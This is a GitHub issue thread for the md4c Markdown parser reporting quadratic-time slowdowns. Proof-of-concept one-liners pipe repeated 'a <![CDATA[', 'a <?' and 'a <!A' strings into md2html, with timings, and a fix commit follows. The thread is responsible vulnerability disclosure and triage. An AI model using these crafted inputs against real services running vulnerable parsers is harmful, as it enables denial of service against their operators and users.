We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Found this vulnerability in pulldown-cmark. It appears md4c is also vulnerable.
python -c 'print("a <![CDATA[" * 10000)' | time md2html/md2html > /dev/null 0.38user 0.00system 0:00.39elapsed 95%CPU (0avgtext+0avgdata 2688maxresident)k python -c 'print("a <![CDATA[" * 20000)' | time md2html/md2html > /dev/null 1.49user 0.00system 0:01.51elapsed 98%CPU (0avgtext+0avgdata 4204maxresident)k python -c 'print("a <![CDATA[" * 40000)' | time md2html/md2html > /dev/null 5.96user 0.00system 0:05.99elapsed 99%CPU (0avgtext+0avgdata 7016maxresident)k
The text was updated successfully, but these errors were encountered:
Ack.
Seems to be also the case for repetitions of a <?
a <?
$ time python -c 'print("a <? " * 10000)' | ./md2html/md2html >/dev/null real 0m0.615s user 0m0.015s sys 0m0.031s $ time python -c 'print("a <? " * 20000)' | ./md2html/md2html >/dev/null real 0m2.227s user 0m0.000s sys 0m0.046s
Sorry, something went wrong.
And repetitions of a <!A:
a <!A
$ time python -c 'print("a <!A" * 10000)' | ./md2html/md2html >/dev/null real 0m0.529s user 0m0.000s sys 0m0.062s $ time python -c 'print("a <!A" * 20000)' | ./md2html/md2html >/dev/null real 0m1.890s user 0m0.015s sys 0m0.015s $ time python -c 'print("a <!A" * 30000)' | ./md2html/md2html >/dev/null real 0m4.169s user 0m0.000s sys 0m0.030s
d4d1091
Amazed by the lightning speed turnaround on this! 👀
No branches or pull requests
Found this vulnerability in pulldown-cmark. It appears md4c is also vulnerable.
The text was updated successfully, but these errors were encountered: